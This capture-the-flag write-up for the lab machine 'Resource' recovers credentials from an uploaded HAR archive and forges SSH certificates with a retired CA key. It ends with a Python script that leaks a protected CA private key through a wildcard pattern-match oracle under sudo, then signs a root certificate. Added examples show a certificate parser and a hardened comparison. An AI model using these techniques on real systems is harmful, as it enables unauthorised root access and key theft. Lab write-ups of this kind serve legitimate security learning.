Resource is a hard-rated Capture The Flag (CTF) machine. This writeup keeps each step short: add the hosts, map the services, pull credentials out of an uploaded archive, then abuse two SSH certificate authorities (a retired CA key left on disk and a leaked one) to reach root.
Add Hosts
```text
10.10.11.27 ssg.htb itrc.ssg.htb
```
Script to add hosts automatically
```bash
ip="10.10.11.27"
domain="ssg.htb itrc.ssg.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
```
Mapping
```text
Nmap scan report for itrc.ssg.htb (10.10.11.27)
Host is up (0.052s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
|   256 78:1e:3b:85:12:64:a1:f6:df:52:41:ad:8f:52:97:c0 (ECDSA)
|_  256 e1:1a:b5:0e:87:a4:a1:81:69:94:9d:d4:d4:a3:8a:f9 (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://itrc.ssg.htb/
2222/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 f2:a6:83:b9:90:6b:6c:54:32:22:ec:af:17:04:bd:16 (ECDSA)
|_  256 0c:c3:9c:10:f5:7f:d3:e4:a8:28:6a:51:ad:1a:e1:bf (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Two SSH services with different builds (OpenSSH 9.2 on Debian on port 22, OpenSSH 8.9 on Ubuntu on port 2222) point to port 22 being forwarded into a container and 2222 belonging to the host; the later steps move from one to the other.
Once you have a session on the site, copy the PHPSESSID cookie value and use it to download the uploaded archive. The HAR capture inside it contains a request with a username and password in it:

```bash
# download the archive with the session cookie
curl http://itrc.ssg.htb/uploads/c2f4813259cc57fab36b311c5058cf031cb6eb51.zip -b 'PHPSESSID=<value>' -o c2f4813259cc57fab36b311c5058cf031cb6eb51.zip
unzip c2f4813259cc57fab36b311c5058cf031cb6eb51.zip
# pull the credentials out of the HTTP archive
grep -oP 'user=[^&]+&pass=[^"]+' itrc.ssg.htb.har
rm -rf c2f4813259cc57fab36b311c5058cf031cb6eb51.zip itrc.ssg.htb.har
```
Log in with the recovered password:

```bash
ssh msainristil@itrc.ssg.htb
```
CA Certificate Authority

msainristil's home holds decommission_old_ca/ with the retired CA private key ca-itrc. The container's sshd still trusts it, as the login below shows, so a key signed with it for the principal root gives a root shell locally:

```bash
cd decommission_old_ca/
# fresh key pair to be certified
ssh-keygen -t rsa -b 2048 -f keypair
# sign it with the old CA: key id user-cert, principal root, valid 52 weeks, serial 12345
ssh-keygen -s ca-itrc -I user-cert -n root -V +52w -z 12345 keypair.pub
ssh -o CertificateFile=keypair-cert.pub -i keypair root@localhost
```
Read the user flag and leave the root shell:

```bash
cat /home/zzinter/user.txt
exit
```
Now for zzinter, sign a second key with the same old CA, this time for the principal zzinter:

```bash
cd decommission_old_ca/
ssh-keygen -t rsa -C zzinter@ssg.htb -f users_key
# produces users_key-cert.pub
ssh-keygen -s ca-itrc -n zzinter -I ident users_key.pub
```
On your local machine, fetch the key and its certificate (ssh picks up users_key-cert.pub next to users_key automatically):

```bash
scp msainristil@itrc.ssg.htb:'/home/msainristil/decommission_old_ca/users_key*' .
ssh -i users_key zzinter@ssg.htb
```
To move from zzinter in the itrc container to the Docker host, reuse zzinter's API-backed signing script. It only requests the principals hard-coded in supported_principals, but that list lives in the script itself, so a local copy with one more principal signs whatever you ask for:

```bash
cp sign_key_api.sh sign.sh
chmod +x sign.sh
# add zzinter_temp to the principals the script is willing to request
sed -i 's/supported_principals="webserver,analytics,support,security"/supported_principals="webserver,analytics,support,security,zzinter_temp"/' sign.sh
rm -f keypair*
ssh-keygen -f keypair
# public key, user, principal; the signed certificate comes back on stdout
./sign.sh keypair.pub zzinter zzinter_temp | tee keypair-cert.pub
ssh -o CertificateFile=keypair-cert.pub -i keypair zzinter@172.223.0.1 -p 2222
```

172.223.0.1 was found with a ping sweep and port scan from inside the container.
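Each certificate step so far (root inside the container, zzinter, then zzinter_temp on the host) works because sshd decides on what the certificate says about itself: its type, the principals it names and its validity window, plus a signature by a CA it trusts. `ssh-keygen -L -f keypair-cert.pub` prints those fields. The block below is an added example, not code from this writeup or from the box: it reads the same public fields from an ed25519 certificate line with a small wire-format parser and then applies the principal and validity rules the way sshd does (the signature itself is not verified). The certificate it parses is constructed in code with dummy nonce, key and signature bytes so the block runs offline; the `allowed_principals` argument is my stand-in for an AuthorizedPrincipalsFile, and the field names are mine.

```python
import base64
import struct

CERT_TYPE = "ssh-ed25519-cert-v01@openssh.com"
USER_CERT = 1                                   # SSH_CERT_TYPE_USER; host certs use 2
SAMPLE_AFTER = 1_700_000_000                    # constructed validity window,
SAMPLE_BEFORE = SAMPLE_AFTER + 52 * 7 * 86400   # 52 weeks long like -V +52w


def _s(b: bytes) -> bytes:
    """SSH wire 'string': 4-byte big-endian length, then the bytes."""
    return struct.pack(">I", len(b)) + b


class _Reader:
    """Cursor over an SSH wire-format buffer."""

    def __init__(self, buf: bytes):
        self.buf, self.pos = buf, 0

    def u32(self) -> int:
        (v,) = struct.unpack_from(">I", self.buf, self.pos)
        self.pos += 4
        return v

    def u64(self) -> int:
        (v,) = struct.unpack_from(">Q", self.buf, self.pos)
        self.pos += 8
        return v

    def string(self) -> bytes:
        n = self.u32()
        v = self.buf[self.pos:self.pos + n]
        self.pos += n
        return v


def build_cert(key_id, principals, serial, valid_after, valid_before) -> str:
    """Constructed '-cert.pub' line for the parser. Nonce, key and signature
    bytes are dummies, so no sshd would accept it; the field layout is real."""
    body = (
        _s(CERT_TYPE.encode())
        + _s(bytes(32))                                  # nonce
        + _s(bytes([1]) * 32)                            # certified ed25519 key (dummy)
        + struct.pack(">Q", serial)
        + struct.pack(">I", USER_CERT)
        + _s(key_id.encode())
        + _s(b"".join(_s(p.encode()) for p in principals))  # valid principals
        + struct.pack(">Q", valid_after)
        + struct.pack(">Q", valid_before)
        + _s(b"") + _s(b"") + _s(b"")                    # critical options, extensions, reserved
        + _s(_s(b"ssh-ed25519") + _s(bytes([2]) * 32))  # CA public key (dummy)
        + _s(_s(b"ssh-ed25519") + _s(bytes([3]) * 64))  # signature (dummy)
    )
    return f"{CERT_TYPE} {base64.b64encode(body).decode()} constructed"


def parse_cert(line: str) -> dict:
    """Read the public fields sshd decides on (what 'ssh-keygen -L' prints)."""
    parts = line.split()
    if len(parts) < 2 or parts[0] != CERT_TYPE:
        raise ValueError("not an ed25519 OpenSSH certificate line")
    r = _Reader(base64.b64decode(parts[1]))
    if r.string().decode() != CERT_TYPE:
        raise ValueError("certificate body type does not match the prefix")
    r.string()                                           # nonce
    r.string()                                           # certified public key
    cert = {"serial": r.u64(), "type": r.u32(), "key_id": r.string().decode()}
    names, cert["principals"] = _Reader(r.string()), []
    while names.pos < len(names.buf):
        cert["principals"].append(names.string().decode())
    cert["valid_after"], cert["valid_before"] = r.u64(), r.u64()
    return cert


def would_authorize(cert, login_user, now, allowed_principals=None) -> bool:
    """Principal and validity rules sshd applies after checking the CA signature
    (signature not modelled). Without an AuthorizedPrincipalsFile the login name
    must itself be a listed principal; with one, only its entries count, which is
    how a certificate for principal root_user can log in as root."""
    if cert["type"] != USER_CERT or not cert["valid_after"] <= now < cert["valid_before"]:
        return False
    if not cert["principals"]:
        # The format lets an empty list mean "any principal"; a check meant to
        # restrict access must fail closed on that rather than fall open.
        return False
    accepted = set(allowed_principals) if allowed_principals is not None else {login_user}
    return any(p in accepted for p in cert["principals"])


if __name__ == "__main__":
    c = parse_cert(build_cert("user-cert", ["root"], 12345, SAMPLE_AFTER, SAMPLE_BEFORE))
    print(c)
    print("root:", would_authorize(c, "root", SAMPLE_AFTER + 1),
          "zzinter:", would_authorize(c, "zzinter", SAMPLE_AFTER + 1))
```

The RSA variant of the format differs only in the certified-key fields (two mpints instead of one ed25519 blob); the serial, key id, principals and validity fields sit in the same order after them. When triaging a suspicious certificate, the serial and key id are what you search for in the CA's signing log, which is why the writeup's `-z` and `-I` values matter.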
Now for root
On the host, zzinter can run /opt/sign_key.sh through sudo. The script refuses the protected CA with "Error: Use API for signing with this CA." when the supplied CA file matches it, and the comparison evidently treats the supplied contents as a shell pattern, so a prefix followed by `*` still matches. That yes/no answer leaks the key one character at a time:

```python
#!/usr/bin/env python3
# Leak the protected CA private key one character at a time through the
# signing script's pattern-matched CA check.
import subprocess
import string


def run_signing_command(pattern):
    # the candidate pattern is handed to the script as the CA file
    with open('/tmp/ca-test', 'w') as f:
        f.write(pattern)
    result = subprocess.run(
        ['sudo', '/opt/sign_key.sh', '/tmp/ca-test', 'root.pub', 'root', 'root_user', 'ABCD'],
        capture_output=True, text=True)
    return result.stdout.strip(), result.stderr.strip()


def brute_force_patterns():
    # base64 alphabet plus the characters of the PEM header and line breaks
    chars = string.ascii_letters + string.digits + '-+=/ \r\n'
    base_pattern = ''
    while True:
        found = False
        for char in chars:
            pattern = base_pattern + char + '*'
            stdout, _ = run_signing_command(pattern)
            if "Error: Use API for signing with this CA." in stdout:
                base_pattern += char
                print(base_pattern)
                found = True
                break
        if not found:
            # no single character extends the match: the whole file is known
            break
    return base_pattern


if __name__ == '__main__':
    ca_key = brute_force_patterns()
    if "-----END OPENSSH PRIVATE KEY-----" in ca_key:
        with open("ca-it", "w") as file:
            file.write(ca_key)
        print("\n\nSuccess\n")
    else:
        exit("\n\nFail\n")
```
Now, on your local machine, paste the contents of ca-it into pwn.key and use it as the host's CA:

```bash
nano pwn.key            # paste the leaked key
chmod 600 pwn.key
yes | ssh-keygen -f root
# sign root.pub with the leaked CA: serial 200, key id root, principal root_user,
# valid from ten weeks ago with no expiry
ssh-keygen -s pwn.key -z 200 -I root -V -10w:forever -n root_user root.pub
ssh root@itrc.ssg.htb -p 2222 -i root -i root-cert.pub
```
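The brute force above only works because the signing script's CA check answers a yes/no question about attacker-controlled text and treats that text as a pattern. The following added example (my own code, not the writeup's script or anything from the box) reproduces that oracle locally against a constructed fake key and runs the same prefix walk as a reusable function; how the real script compares the files is an assumption here, modelled as an unquoted bash `[[ "$protected" == $supplied ]]`, which is exactly what a `*` wildcard needs. The hardened oracle beside it shows that a literal constant-time comparison leaves the walk with nothing.

```python
import fnmatch
import hmac
import string

# Constructed stand-in for the protected CA private key on the host.
# It is NOT the real key from the box; it only needs the same shape.
FAKE_CA_KEY = (
    "-----BEGIN OPENSSH PRIVATE KEY-----\n"
    "b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMw==\n"
    "-----END OPENSSH PRIVATE KEY-----\n"
)

# Same alphabet the writeup's script uses: base64 plus the PEM header characters.
ALPHABET = string.ascii_letters + string.digits + "-+=/ \r\n"


def vulnerable_oracle(supplied: str) -> bool:
    """Assumed guard: the supplied file contents are compared with the protected
    key by an unquoted bash pattern match, so '*' and '?' act as wildcards.
    True corresponds to the script printing 'Error: Use API for signing with this CA.'"""
    return fnmatch.fnmatchcase(FAKE_CA_KEY, supplied)


def hardened_oracle(supplied: str) -> bool:
    """Fixed guard: a literal, constant-time comparison. No wildcards and no
    early exit, so neither the answer nor its timing depends on a prefix."""
    return hmac.compare_digest(supplied.encode(), FAKE_CA_KEY.encode())


def leak_secret(oracle, alphabet=ALPHABET, max_len=4096):
    """Recover the secret one character at a time by asking prefix + '*'.
    Exactly one character can extend a correct prefix, so the walk never
    takes a wrong branch; it stops when no character extends the prefix,
    which for a PEM file is right after the final newline.
    Returns (recovered_text, number_of_oracle_queries)."""
    prefix, queries = "", 0
    while len(prefix) < max_len:
        for ch in alphabet:
            queries += 1
            if oracle(prefix + ch + "*"):
                prefix += ch
                break
        else:
            break
    return prefix, queries


if __name__ == "__main__":
    leaked, n = leak_secret(vulnerable_oracle)
    print(f"recovered {len(leaked)} bytes in {n} queries; exact={leaked == FAKE_CA_KEY}")
    print("hardened guard leaks:", repr(leak_secret(hardened_oracle)[0]))
```

The same walk works against any oracle that evaluates attacker-supplied text as a shell pattern, for example the unquoted right-hand side of `[[ ... == ... ]]` or a `case` arm. The fix is to make the comparison literal (quote the right-hand side, or compare the files with `cmp`), not to reject `*`, since `?` and `[...]` leak just as well.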